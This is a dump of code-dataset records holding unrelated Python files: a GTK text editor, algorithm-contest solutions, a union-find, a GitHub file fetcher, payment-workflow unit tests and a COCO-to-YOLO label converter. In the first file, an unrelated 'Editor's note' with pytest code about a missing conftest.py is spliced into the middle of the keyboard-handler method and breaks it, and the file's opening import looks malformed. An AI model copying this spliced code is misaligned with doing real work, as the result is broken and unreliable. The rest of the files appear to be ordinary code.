import Search\nfrom windows import Gtk, Gdk, g\nfrom dialogs.about import About\nfrom dialogs.open_file import OpenFile\nfrom widgets.text_view import TextView\n\n\nclass App:\n def destroy(self, widget):\n Gtk.main_quit()\n\n def about(self, widget):\n About(self.is_dev)\n\n def search(self, widget):\n self.textview.on_clear_clicked()\n self.textview.on_search_clicked()\n\n def replace(self, widget):\n self.textview.on_clear_clicked()\n self.textview.on_replace_clicked()\n\n def save(self, widget, has_name):\n is_saved, filename = self.open_file_inst.save_as() if has_name else self.open_file_inst.save()\n if is_saved:\n self.bar.push(0, filename)\n else:\n self.err_dialog = Gtk.MessageDialog(self, Gtk.DialogFlags.MODAL, Gtk.MessageType.INFO,\n Gtk.ButtonsType.OK, g(\"Alert\"))\n self.err_dialog.format_secondary_text(g(\"File %s not saved.\") % filename)\n self.err_dialog.show()\n\n def open_file(self, widget):\n is_opened, filename = self.open_file_inst.run()\n if is_opened:\n self.bar.push(0, filename)\n\n def _key_press_event(self, widget, event):\n keyval = event.keyval\n keyval_name = Gdk.keyval_name(keyval)\n state = event.state\n ctrl = (state & Gdk.ModifierType.CONTROL_MASK)\n if ctrl and keyval_name == 's':\n self.save(widget)\n elif ctrl and keyval_name == 'o':\n self.open_file(widget)\n elif ctrl and keyval_name == 'q':\n self.destroy(widget)\n elif ctrl and keyval_name == 'r':\n self.replace(widget)\n elif ctrl and keyval_name == 'f':\n 
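
Editor's note: a hedged sketch of a test module that would consume the fixtures this conftest.py defines. It is a hypothetical file; it assumes the Calculator class exposes an add method and that every row in calc.yaml is an [a, b, expected] triple:

def test_env_option(cmdoption):
    # cmdoption returns whatever --env was set to (default 'test').
    assert cmdoption in ('test', 'dev', 'prod')

def test_add(get_datas, get_calc):
    a, b, expected = get_datas          # one parametrized YAML row per test run
    assert get_calc.add(a, b) == expected
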
self.search(widget)\n elif keyval_name == \"Escape\":\n self.destroy(widget)\n else:\n return False\n return True\n\n def translation(self, widget):\n webbrowser.open(\"https://github.com/karim88/SupMTI-TextEditor\")\n\n def report(self, widget):\n webbrowser.open(\"https://github.com/karim88/SupMTI-TextEditor/issues\")\n\n def __init__(self, files, is_dev):\n self.is_dev = is_dev\n self.files = files\n self.win = Gtk.Window()\n self.win.set_default_size(800, 600)\n\n self.win.connect('key-press-event', self._key_press_event)\n\n # HeadBar\n self.head = Gtk.HeaderBar()\n self.head.props.show_close_button = True\n self.head.props.title = g(\"SupMTI-TextEditor\")\n self.win.set_titlebar(self.head)\n\n # Containers\n self.box = Gtk.VBox()\n self.menu = Gtk.MenuBar()\n self.menu.set_hexpand(True)\n\n # Text Editor\n self.textview = TextView(self.files)\n self.open_file_inst = OpenFile(self.files, self.textview)\n\n # StatusBar\n self.bar = Gtk.Statusbar()\n self.bar.push(0, g(\"New file\"))\n\n self.stmenu = Gtk.MenuItem(g(\"Menu\"))\n self.menu.append(self.stmenu)\n self.m = Gtk.Menu()\n self.stmenu.set_submenu(self.m)\n \"\"\" Open file \"\"\"\n self.open = Gtk.MenuItem(g(\"Open file\"))\n self.open.connect('activate', self.open_file)\n self.m.append(self.open)\n \"\"\" Save \"\"\"\n self.save_widget = Gtk.MenuItem(g(\"Save\"))\n self.save_widget.connect('activate', self.save, False)\n self.m.append(self.save_widget)\n \"\"\" Save as \"\"\"\n self.save_widget = Gtk.MenuItem(g(\"Save as\"))\n self.save_widget.connect('activate', self.save, True)\n self.m.append(self.save_widget)\n \"\"\" Search \"\"\"\n self.search_menu = Gtk.MenuItem(g('Find'))\n self.m.append(self.search_menu)\n self.search_menu.connect('activate', self.search)\n \"\"\" Search & Eeplace \"\"\"\n self.replace_menu = Gtk.MenuItem(g('Find & Replace'))\n self.m.append(self.replace_menu)\n self.replace_menu.connect('activate', self.replace)\n \"\"\" Exit \"\"\"\n self.xit = Gtk.MenuItem(g(\"Exit\"))\n self.xit.connect('activate', self.destroy)\n self.m.append(self.xit)\n\n self.hmenu = Gtk.MenuItem(g(\"Help\"))\n self.menu.append(self.hmenu)\n self.m2 = Gtk.Menu()\n self.hmenu.set_submenu(self.m2)\n \"\"\" Translate \"\"\"\n self.tra = Gtk.MenuItem(g(\"Translate this Application\"))\n self.tra.connect('activate', self.translation)\n self.m2.append(self.tra)\n \"\"\" Report a bug \"\"\"\n self.bug = Gtk.MenuItem(g(\"Report a bug\"))\n self.bug.connect('activate', self.report)\n self.m2.append(self.bug)\n \"\"\" About \"\"\"\n self.abt = Gtk.MenuItem(g(\"About\"))\n self.abt.connect('activate', self.about)\n self.m2.append(self.abt)\n\n self.head.pack_start(self.menu)\n self.box.pack_end(self.bar, False, False, 0)\n self.box.pack_end(self.textview.scrolled_window, True, True, 0)\n\n self.win.add(self.box)\n self.win.show_all()\n self.win.connect(\"destroy\", self.destroy)\n\n def main(self):\n Gtk.main()\n","repo_name":"karim88/SupMTI-TextEditor","sub_path":"windows/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5092,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"2479084393","text":"from metabolicnetwork import MetabolicNetwork\r\nfrom shared import InputOptions\r\n\r\nimport graph\r\n\r\n\r\nclass RunMetabolicalNetworkController:\r\n '''\r\n This class implements the controllers of each functionality.\r\n Allows the interaction between the user and the metabolic network.\r\n '''\r\n\r\n def __init__(self, options):\r\n self.options = 
options\r\n\r\n\r\n def load_from_file(self):\r\n 'Creates a new MetabolicNetwork object from the filepath introduced.'\r\n self.metabolic_network = MetabolicNetwork.create(self.options[InputOptions.FILEPATH])\r\n if self.metabolic_network is None:\r\n raise Exception(\"File not valid!\")\r\n return self\r\n\r\n \r\n def get_topological_analysis(self):\r\n 'Gets the topological measures of the metabolic network and sends to the user. '\r\n if self.options[InputOptions.TOPOLOGICAL_ANALYSIS]:\r\n return self.metabolic_network.get_centrality_measures()\r\n else:\r\n return None, None\r\n \r\n def get_graphical_visualization(self):\r\n 'Gets the 3D graph visualization of the metabolic network and shows to the user.'\r\n if self.options[InputOptions.GRAPHIC_VISUALIZATION]:\r\n return self.metabolic_network.show_graphical_visualization()\r\n \r\n \r\n def get_number_reactions_metabolites(self):\r\n 'Gets the number of reactions and metabolites from the metabolic network and sends to the user'\r\n if self.options[InputOptions.NUMBER_REACT_MET]:\r\n return self.metabolic_network.get_number_reactions_metabolites()\r\n else:\r\n return [None, None]\r\n \r\n \r\n def get_final_metabolites(self):\r\n 'Gets the final metabolites of the metabolic network and sends to the user.'\r\n if self.options[InputOptions.FINAL_METABOLITES]:\r\n return self.metabolic_network.get_final_metabolites()\r\n \r\n \r\n def get_active_reactions(self):\r\n 'Gets the active reactions through the list of metabolites introduced by the user and sends to him.'\r\n if self.options[InputOptions.ALL_REACTIONS] != []:\r\n list_metabolites = self.options[InputOptions.ALL_REACTIONS]\r\n return self.metabolic_network.get_active_reactions(list_metabolites)\r\n\r\n \r\n def get_top5_metabolites(self):\r\n 'Gets the five most frequent metabolites of the metabolic network and sends to the user.'\r\n if self.options[InputOptions.TOP5_METABOLITES]:\r\n return self.metabolic_network.get_frequent_metabolites()\r\n\r\n \r\n def get_metabolites_excreted(self):\r\n 'Gets the metabolites excreted through the list of metabolites introduced by the user and sends to him.'\r\n if self.options[InputOptions.ALL_PRODUCTS] != []:\r\n list_metabolites = self.options[InputOptions.ALL_PRODUCTS]\r\n return self.metabolic_network.get_metabolites_excreted(list_metabolites) \r\n\r\n\r\n def generate_metabolic_networks(self):\r\n 'Gets the file with *.txt format with the metabolic network of the pathway introduced by the user and sends to him.'\r\n if self.options[InputOptions.AUTO_GENERATION]:\r\n pathway = self.options[InputOptions.AUTO_GENERATION_PATHWAY]\r\n return self.metabolic_network.generate_metabolic_networks(pathway)\r\n","repo_name":"paty-oliveira/MetabolicNetwork","sub_path":"metnet/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":3309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71784304872","text":"'''\nleetcode 98\n다시보기. 
박수진 찍어준 문제\n'''\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def isValidBST(self, root: TreeNode) -> bool:\n self.sol = True\n\n def getMinMax(root):\n if not self.sol:\n return -1, -1\n\n if root.left:\n left_min, left_max = getMinMax(root.left)\n\n if left_max >= root.val:\n self.sol = False\n return -1, -1\n else:\n left_min = root.val\n\n if root.right:\n right_min, right_max = getMinMax(root.right)\n\n if right_min <= root.val:\n self.sol = False\n return -1, -1\n else:\n right_max = root.val\n\n return left_min, right_max\n\n if root:\n getMinMax(root)\n return self.sol\n\n def isValidBST2(self, root):\n def checkMinMax(root, mi, ma):\n if not root:\n return True\n\n if mi != None and mi >= root.val or ma != None and ma <= root.val:\n return False\n\n return checkMinMax(root.left, mi, root.val) and checkMinMax(root.right, root.val, ma)\n\n return checkMinMax(root, None, None)\n\n def isValidBST3(self, root):\n self.prev = None\n\n def inorder(root):\n if not root: return True\n\n l = inorder(root.left)\n if not l: return False\n\n if self.prev is not None:\n if self.prev >= root.val: return False\n self.prev = root.val\n\n r = inorder(root.right)\n return r\n\n return inorder(root)\n","repo_name":"yhancsx/algorithm-weekly","sub_path":"cracking_the_coding_interview/4.5.py","file_name":"4.5.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"69813055594","text":"import sys; input= lambda: sys.stdin.readline().rstrip()\nfor _ in range(int(input())):\n n= int(input())\n L= [*map(int, input().split())]\n if n==1:\n print(0)\n continue\n\n def find_max(_from):\n ans=n-1\n mx=L[n-1]\n for i in range(n-2,_from-1,-1):\n if L[i]>mx:\n mx=L[i]\n ans=i\n return ans\n\n sellingday=find_max(0)\n profit=0\n amount=0\n for i in range(n):\n if i==sellingday:\n profit+=amount*L[i]\n if i+1==n:break\n sellingday=find_max(i+1)\n amount=0\n else:\n amount+=1\n profit-=L[i]\n print(profit)\n\n\n'''\n1\n11\n2 6 8 7 6 5 1 2 3 4 5\n'''","repo_name":"JannaKim/PS","sub_path":"dp/11501_주식.py","file_name":"11501_주식.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21801561516","text":"import networkx as nx\n\ngraph = nx.MultiDiGraph()\n\n# class node(object):\n\n # def __init__(self, num):\n # self.num = num\n\n# class edge(object):\n\n # def __init__(self, type, value):\n # self.type = type\n # self.value = value\n\n# n1 = node(1)\n# graph.add_node(n1)\n# e1 = edge('c', 10)\n# n2 = node(2)\n# graph.add_node(n2)\n# graph.add_edge(n1, n2, object=e1) # is the way you added an edge object correct\n# e2 = edge('r', 6)\n# graph.add_edge(n1, n2, object=e2)\n\ngraph.add_node(1)\ngraph.add_node(2)\ngraph.add_edge(1, 2, key=0, type='c', value=10)\ngraph.add_edge(1, 2, key=1, type='r', value=6)\n\nl = graph.get_edge_data(1,2,0)\nz = l['value']\na = graph.edges()\none = a[1]\nprint('Nodes are', one[0], 'and', one[1])\nprint(graph.edge)\ngraph.add_edge(3, 4, key=1, type='c', value=10)\nprint(graph.edge)\nprint(graph.node)\n\n\n\n#print(graph.number_of_edges())\n#print(graph.number_of_nodes())\n\n#a = list(graph.nodes())\n#for node in a:\n # 
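
Editor's note: the 11501 solution above rescans the remaining suffix with find_max after every sale, which is quadratic in the worst case. An equivalent one-pass greedy walks right to left keeping the running maximum selling price; on the sample in the file's trailing comment it also yields 18:

def max_profit(prices):
    best, profit = 0, 0
    for p in reversed(prices):
        if p > best:
            best = p                 # a new best day to sell
        else:
            profit += best - p       # buy here, sell at the running maximum
    return profit

print(max_profit([2, 6, 8, 7, 6, 5, 1, 2, 3, 4, 5]))   # 18
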
print(node)\n\n","repo_name":"krishnakpatel/Summer2017","sub_path":"graphv3.py","file_name":"graphv3.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25396929350","text":"# var1\n# text = list(map(str, input().split((\" \"))))\n\n# var 2\n# file_object = open(\"week3/test_file.txt\")\n# file_object = sys.stdin\n# lines = file_object.read()\n# text = lines.split()\n\n# var 3\nimport sys\n\nlines = sys.stdin.read()\ntext = lines.split()\n\ncount_dict = {}\nresult = []\nfor world in text:\n num_prev = count_dict.get(world, 0)\n result.append(str(num_prev))\n if num_prev == 0:\n count_dict[world] = 1\n else:\n count_dict[world] += 1\n\nprint(\" \".join(result))\n","repo_name":"Kristobal-Khunta/Algorithms","sub_path":"yandex_algo_course/week4/taskB.py","file_name":"taskB.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"70741836714","text":"class UnionFind():\n def __init__(self, n):\n self.n = n\n self.root = [-1] * n\n self.rank = [0] * n\n\n def find(self, x):\n if(self.root[x] < 0):\n return x\n else:\n self.root[x] = self.find(self.root[x])\n return self.root[x]\n\n def unite(self, x, y):\n x = self.find(x)\n y = self.find(y)\n if(x == y):\n return\n elif(self.rank[x] > self.rank[y]):\n self.root[x] += self.root[y]\n self.root[y] = x\n else:\n self.root[y] += self.root[x]\n self.root[x] = y\n if(self.rank[x] == self.rank[y]):\n self.rank[y] += 1\n\n def roots(self):\n return [i for i, x in enumerate(self.root) if x < 0]\n\n def group_size(self):\n return len(self.roots())\n\n\nn, m = map(int, input().split())\nabl = [list(map(int, input().split())) for _ in range(m)]\n\nans = 0\nfor i in range(m):\n uf = UnionFind(n)\n for j in range(m):\n if j == i:\n continue\n a, b = abl[j]\n uf.unite(a - 1, b - 1)\n if uf.group_size() > 1:\n ans += 1\nprint(ans)","repo_name":"ymsk-sky/atcoder_part3","sub_path":"to_skyblue/086_abc075c_Bridge.py","file_name":"086_abc075c_Bridge.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15148833659","text":"# -*- coding: utf-8 -*-\r\n\r\nimport sys\r\nimport copy\r\n\r\ninput = sys.stdin.readline\r\n\r\n# ---------------------------------------------------------\r\n\r\nfrom collections import Counter\r\n\r\nN, M = map(int, input().split())\r\nname = input().rstrip()\r\nkit = input().rstrip()\r\n\r\nname_cnt = Counter(name)\r\nkit_cnt = Counter(kit)\r\n\r\nfor key, val in name_cnt.items():\r\n if kit_cnt[key] == 0:\r\n print(-1)\r\n exit()\r\n\r\nans = 0\r\nfor key, val in name_cnt.items():\r\n d = kit_cnt[key]\r\n ans = max(ans, (val + d - 1) // d)\r\n\r\nprint(ans)","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/arc008/B/4921412.py","file_name":"4921412.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"6231655996","text":"from get_github_code.constants import API_URL\nfrom get_github_code.decode import Decode\nfrom get_github_code.exceptions import GetCodeException\nfrom get_github_code.json import JSON\nfrom get_github_code.request import Request\n\n\nclass GetCode(Request, JSON, Decode):\n \"\"\"### GetCode class\n\n Args:\n `user (str)`: GitHub Username\n\n `repo (str)`: GitHub repository name\n\n `branch (str)`: Github 
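
Editor's note: the abc075c bridge counter above deletes one edge at a time and asks the UnionFind whether the graph falls apart. A self-contained miniature of the same disjoint-set idea (path halving, no rank), exercised on a four-node path graph:

class DSU:
    def __init__(self, n):
        self.p = list(range(n))

    def find(self, x):
        while self.p[x] != x:
            self.p[x] = self.p[self.p[x]]   # path halving
            x = self.p[x]
        return x

    def unite(self, a, b):
        self.p[self.find(a)] = self.find(b)

dsu = DSU(4)
for a, b in [(0, 1), (1, 2)]:
    dsu.unite(a, b)
print(len({dsu.find(x) for x in range(4)}))   # 2 components: {0, 1, 2} and {3}
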
repository branch\n\n `file_path (str)`: File path in repository\n\n functions:\n `(property) get_code -> str:`\n Return github code from file_path\n\n `(property) async_get_code -> str:`\n Asynchronous return github code from file_path\n \"\"\"\n def __init__(\n self,\n user: str,\n repo: str,\n branch: str,\n file_path: str,\n ) -> None:\n self.user: str = user\n self.repo: str = repo\n self.branch: str = branch\n self.file: str = file_path\n self.url: str = API_URL.format(self.user, self.repo,\n self.file, self.branch)\n\n @property\n def get_code(self) -> str:\n \"\"\"Return github code from file_path\"\"\"\n\n response = self.request(url=self.url)\n if not response.status == 200:\n raise GetCodeException(\"Connection refused\")\n return self.loads(data=response._body.decode(\"utf-8\"))[\"content\"]\n\n @property\n async def async_get_code(self) -> str:\n \"\"\"Asynchronous return github code from file_path\"\"\"\n\n response = await self.async_request(url=self.url)\n if not response.status == 200:\n raise GetCodeException(\"Connection refused\")\n json = self.loads(data=response)[\"content\"]\n return self.b64(data=json)\n\n\ndef get_code(\n user: str,\n repo: str,\n file_path: str,\n branch: str = \"main\",\n) -> str:\n \"\"\"Get github code from repository\n\n Args:\n `user (str)`: GitHub Username\n\n `repo (str)`: GitHub repository name\n\n `branch (str)`: Github repository branch. Defaults to `\"main\"`\n\n `file_path (str)`: File path in repository\n\n Returns:\n str: Code from github repository\n \"\"\"\n return GetCode(user, repo, branch, file_path).get_code\n\n\nasync def async_get_code(\n user: str,\n repo: str,\n file_path: str,\n branch: str = \"main\",\n) -> str:\n \"\"\"Asynchronous get github code from repository\n\n Args:\n `user (str)`: GitHub Username\n\n `repo (str)`: GitHub repository name\n\n `branch (str)`: Github repository branch. 
Defaults to `\"main\"`\n\n `file_path (str)`: File path in repository\n\n Returns:\n str: Code from github repository\n \"\"\"\n return await GetCode(user, repo, branch, file_path).async_get_code\n","repo_name":"Vlad2030/get-code-from-github","sub_path":"get_github_code/get_code/get_code.py","file_name":"get_code.py","file_ext":"py","file_size_in_byte":2888,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"467260199","text":"# coding: utf8\nfrom __future__ import unicode_literals, absolute_import, division, print_function\n\nfrom datetime import datetime\n\nimport mock\nimport pytest\n\nimport travel.rasp.train_api.train_purchase.workflow.payment.clear_payment\nfrom common.data_api.billing.trust_client import TrustClientRequestError, TrustPaymentInfo, TrustPaymentStatuses\nfrom common.workflow.tests_utils.process import process_state_action\nfrom travel.rasp.train_api.train_purchase.core.enums import OrderStatus\nfrom travel.rasp.train_api.train_purchase.core.factories import TrainOrderFactory, RefundPaymentFactory\nfrom travel.rasp.train_api.train_purchase.core.models import RefundPaymentStatus\nfrom travel.rasp.train_api.train_purchase.workflow.payment import ClearPaymentEvents, ClearPayment\n\npytestmark = [pytest.mark.mongouser('module'), pytest.mark.dbuser('module')]\n\n\ndef _process(payment):\n return process_state_action(ClearPayment, (ClearPaymentEvents.OK,), payment)\n\n\n@mock.patch.object(travel.rasp.train_api.train_purchase.workflow.payment.clear_payment.TrustClient, 'clear_payment', autospec=True)\ndef test_clear_payment_ok(m_clear_payment):\n side_effects = [TrustClientRequestError('a_few_of_request_errors #%d' % i) for i in range(2)]\n side_effects.append(None)\n m_clear_payment.side_effect = side_effects\n\n original_order = TrainOrderFactory(status=OrderStatus.RESERVED,\n payments=[dict(purchase_token='some_purchase_token')])\n event, payment = _process(original_order.current_billing_payment)\n\n assert m_clear_payment.call_count == len(side_effects)\n assert event == ClearPaymentEvents.OK\n\n\n@mock.patch.object(travel.rasp.train_api.train_purchase.workflow.payment.clear_payment.TrustClient, 'clear_payment', autospec=True)\ndef test_clear_payment_retries_exceeded(m_clear_payment):\n side_effects = [TrustClientRequestError('a_lot_of_request_errors #%d' % i) for i in range(5)]\n m_clear_payment.side_effect = side_effects\n\n original_order = TrainOrderFactory(status=OrderStatus.RESERVED,\n payments=[dict(purchase_token='some_purchase_token')])\n event, payment = _process(original_order.current_billing_payment)\n\n assert m_clear_payment.call_count == len(side_effects)\n assert event != ClearPaymentEvents.OK\n\n\n@mock.patch.object(travel.rasp.train_api.train_purchase.workflow.payment.clear_payment.TrustClient, 'clear_payment', autospec=True)\ndef test_clear_payment_fail(m_clear_payment):\n m_clear_payment.side_effect = [Exception('another_error')]\n\n original_order = TrainOrderFactory(status=OrderStatus.RESERVED,\n payments=[dict(purchase_token='some_purchase_token')])\n event, payment = _process(original_order.current_billing_payment)\n\n assert m_clear_payment.call_count == 1\n assert event != ClearPaymentEvents.OK\n\n\n@mock.patch.object(travel.rasp.train_api.train_purchase.workflow.payment.clear_payment, 'TrustClient', autospec=True)\ndef test_clear_payment_no_need_to_clear(m_trust_client):\n original_order = TrainOrderFactory(\n status=OrderStatus.RESERVED,\n payments=[{'purchase_token': 
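
Editor's note: the Decode and JSON mixins behind GetCode are not shown here, but GitHub's contents endpoint returns file bodies base64-encoded inside a JSON envelope, so the decode step presumably reduces to this dependency-free sketch:

import base64
import json

# A stand-in for the API response body.
payload = json.dumps({'content': base64.b64encode(b"print('hi')\n").decode()})
content = json.loads(payload)['content']
print(base64.b64decode(content).decode('utf-8'))
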
'some_purchase_token', 'immediate_return': True}]\n )\n event, payment = _process(original_order.current_billing_payment)\n assert not m_trust_client.called\n assert event == ClearPaymentEvents.OK\n\n\n@mock.patch.object(travel.rasp.train_api.train_purchase.workflow.payment.clear_payment, 'TrustClient', autospec=True)\ndef test_clear_after_resize(m_trust_client):\n m_trust_client.return_value.get_payment_info.return_value = TrustPaymentInfo({\n 'payment_status': TrustPaymentStatuses.CLEARED,\n 'reversal_id': '123123123'\n })\n purchase_token = 'some_purchase_token'\n\n refund_payment = RefundPaymentFactory(\n factory_extra_params={'create_order': True}, purchase_token=purchase_token, payment_resized=True\n )\n payment = refund_payment.payment\n payment.current_refund_payment_id = refund_payment.id\n payment.save()\n event, payment = _process(payment)\n refund_payment.reload()\n\n m_trust_client.return_value.clear_payment.assert_called_once_with(purchase_token)\n m_trust_client.return_value.get_payment_info.assert_called_once_with(purchase_token)\n assert event == ClearPaymentEvents.OK\n assert refund_payment.refund_payment_status == RefundPaymentStatus.DONE\n assert refund_payment.trust_reversal_id == '123123123'\n\n\n@mock.patch.object(travel.rasp.train_api.train_purchase.workflow.payment.clear_payment, 'TrustClient', autospec=True)\ndef test_skip_cleared(m_trust_client):\n original_order = TrainOrderFactory(\n status=OrderStatus.RESERVED,\n payments=[dict(\n purchase_token='some_purchase_token',\n clear_at=datetime(2018, 10, 9)\n )]\n )\n event, payment = _process(original_order.current_billing_payment)\n\n assert not m_trust_client.called\n assert event == ClearPaymentEvents.OK\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"travel/tests/train_purchase/workflow/payment/test_clear_payment.py","file_name":"test_clear_payment.py","file_ext":"py","file_size_in_byte":4970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8735133996","text":"#problem 547 / friend circles\n##dfs\nclass Solution(object):\n def findCircleNum(self, M):\n \"\"\"\n :type M: List[List[int]]\n :rtype: int\n \"\"\"\n n = len(M)\n visited = [0]*n\n count = 0\n def dfs(i):\n for j in range(n):\n if M[i][j] == 1 and visited[j] == 0:\n visited[j] = 1\n dfs(j)\n for i in range(n):\n if visited[i] == 0:\n dfs(i)\n count += 1\n return count\n\n##bfs\nclass Solution(object):\n def findCircleNum(self, M):\n \"\"\"\n :type M: List[List[int]]\n :rtype: int\n \"\"\"\n queue = collections.deque()\n count = 0\n n = len(M)\n visited = [0]*n\n for i in range(n):\n if visited[i] == 0:\n queue.append(i)\n while queue:\n s = queue.popleft()\n visited[s] = 1\n for j in range(n):\n if M[s][j] == 1 and visited[j] == 0:\n queue.append(j)\n count += 1\n return count","repo_name":"digitalladder/leetcode","sub_path":"problem547.py","file_name":"problem547.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39969498622","text":"'''\r\nJSON (JavaScript Object Notation)\r\n'''\r\n\r\nimport json\r\nimport os\r\n\r\n# folder_path_json = \"C:/Users/user/Desktop/fileload\" #json file load path\r\n# folder_path_txt = \"C:/Users/user/Desktop/fileload\" #txt파일 save path\r\n\r\n#yongwoo's folder path\r\nfolder_path_json = \"C:/Users/PC/Desktop/fileload/lable_json_streetlamp\" #json file load path\r\nfolder_path_txt = \"C:/Users/PC/Desktop/fileload/lable_txt_streetlamp\" 
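
Editor's note: the clear-payment tests drive the retry loop by handing mock a list-valued side_effect, consumed one item per call, so several TrustClientRequestErrors followed by None simulate "fail, fail, succeed". The mechanism in isolation:

from unittest import mock

fn = mock.Mock(side_effect=[IOError('boom'), IOError('boom'), 'ok'])
for attempt in range(3):
    try:
        print(fn())          # raises twice, then returns 'ok'
        break
    except IOError:
        print('retrying...')
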
#txt파일 save path\r\n\r\n\r\n#디코딩(해석, 역직렬화): json:loads()\r\n\r\n#path에 해당하는 파일을 yolo형식으로 바꿔주는 함수\r\n# list를 return함 ==> output.append([id, x, y, w, h])\r\ndef CocoJsonToYoloFormat(path) :\r\n with open(path,'r', encoding='UTF-8') as f : \r\n #path에 해당하는 json파일을 읽기모드로 json파일을 연후에 f라는 이름으로 읽어오기 \r\n json_data = json.load(f) #json_data에 python 객체로 읽어와서 디코딩 \r\n\r\n # print(json.dumps(json_data, indent=\"\\t\"))\r\n\r\n images = json_data['images'][0] \r\n width = images['width'] #image class에서 width\r\n height = images['height'] #image class에서 height\r\n\r\n annotations = json_data['annotations']\r\n output = []\r\n for i in range(len(annotations)) :# annotations class객체에 길이만큼 (2개)\r\n annotation = annotations[i]\r\n #id = annotation['id'] #annotations class에서 id\r\n id = 0 # 정상은 객체인식 0만\r\n bbox = annotation['bbox'] #annotations class에서 bbox\r\n\r\n x = (bbox[0]+(bbox[2]/2)) / width # rate of x\r\n y = (bbox[1]+(bbox[3]/2)) / height # rate of y\r\n w = bbox[2] / width # rate of width\r\n h = bbox[3] / height # rate of height\r\n\r\n output.append([id, x, y, w, h])\r\n return output\r\n\r\ndef saveYoloToTxt(file_name, save_data):#파일이름과, list형식으로 저장된 yolo파일들 \r\n\r\n #file_name에 해당하는 yolo파일을 쓰기모드로 쓰는데 f_txt라는 이름으로 쓰기모드\r\n with open(file_name, 'w', encoding='UTF-8') as f_txt :\r\n for i in range(len(save_data)):# save_data에 길이만큼 반복\r\n save_yoloform = save_data[i] # save_yoloform에 save_data순서대로 넣기 \r\n f_txt.write('%g %.6f %.6f %.6f %.6f' %(save_yoloform[0],save_yoloform[1],save_yoloform[2],save_yoloform[3],save_yoloform[4])) #순서대로 기입\r\n if(i != len(save_data)-1) :\r\n f_txt.write('\\n')\r\n\r\nfileEx = r'.json' #출력하면 .json 으로나오는데 r왜붙힌지 모르겠음\r\nfile_name_list = [file for file in os.listdir(folder_path_json) if file.endswith(fileEx)] # .json으로 접미사가 되어있는 file들만 list로만들어서 file_name_list에 저장 ==> endswith(.json)\r\n'''\r\nendswith\r\n정의된 문자열이 지정된 접미사로 끝나면 True를 return \r\n정의된 문자열의 접미사로 끝나지않으면 False를 return\r\n\r\nos.sep\r\n OS 에 상관없이 디렉토리 구분자 역할함.\r\n'''\r\n\r\nnum_json = len(file_name_list) # file_name_list리스트의 길이 재기 (json파일의 갯수)\r\n\r\nfor index_json in range(num_json) : #json파일의 갯수만큼 반복\r\n file_name = file_name_list[index_json] \r\n path_json = folder_path_json + os.sep + file_name # 경로지정 \r\n # Load\r\n yolo_data = CocoJsonToYoloFormat(path_json)\r\n\r\n # Save\r\n path_txt = folder_path_txt + os.sep + file_name[0:-4]+'txt' #file_name[0:-4] == json ==> 확장자명 바꾸기\r\n saveYoloToTxt(path_txt,yolo_data)\r\n\r\n print(\"process : %d / %d (%d %%) [file : \"%(index_json+1,num_json,(index_json+1)*100/num_json)+file_name+\"\\n\" )","repo_name":"softwareyong/kt_al_road_facility_maintenance","sub_path":"JsonToTxt.py","file_name":"JsonToTxt.py","file_ext":"py","file_size_in_byte":3594,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11286141699","text":"# Given's way\n\nprint(\"Activity - 17 (derek banas test)\")\n\n\n# Instructions\n# Create a program that prints out the fibonacci numbers\n# Of a passed in argument\n\n# Hints\n# Fn = Fn-1 + Fn-2\n# If Fn = 0 and Fn = 1\n# Return them else continue\n\ndef fib(num):\n if num == 0:\n return 0\n elif num == 1:\n return 1\n else:\n result = fib(num - 1) + fib(num - 2)\n return result\n\n\nprint(fib(5))\nprint(fib(6))\nprint(fib(7))\nnumFib = int(input(\"How many fibonacci numbers to display: \"))\ni = 0\nwhile i < numFib:\n fibvalue = fib(i)\n print(fibvalue)\n i += 1\n\nprint(\"All done\")\n","repo_name":"GhettoCole/Python3-","sub_path":"Advanced/Fibonacci numbers.py","file_name":"Fibonacci 
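
Editor's note: the bbox arithmetic inside CocoJsonToYoloFormat, shown on one concrete box. COCO stores [x_min, y_min, w, h] in pixels, while YOLO wants the box centre and size as fractions of the image:

width, height = 640, 480
bbox = [100, 120, 200, 160]               # x_min, y_min, w, h in pixels
x = (bbox[0] + bbox[2] / 2) / width       # 0.3125
y = (bbox[1] + bbox[3] / 2) / height      # 0.416667
w = bbox[2] / width                       # 0.3125
h = bbox[3] / height                      # 0.333333
print('%g %.6f %.6f %.6f %.6f' % (0, x, y, w, h))
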
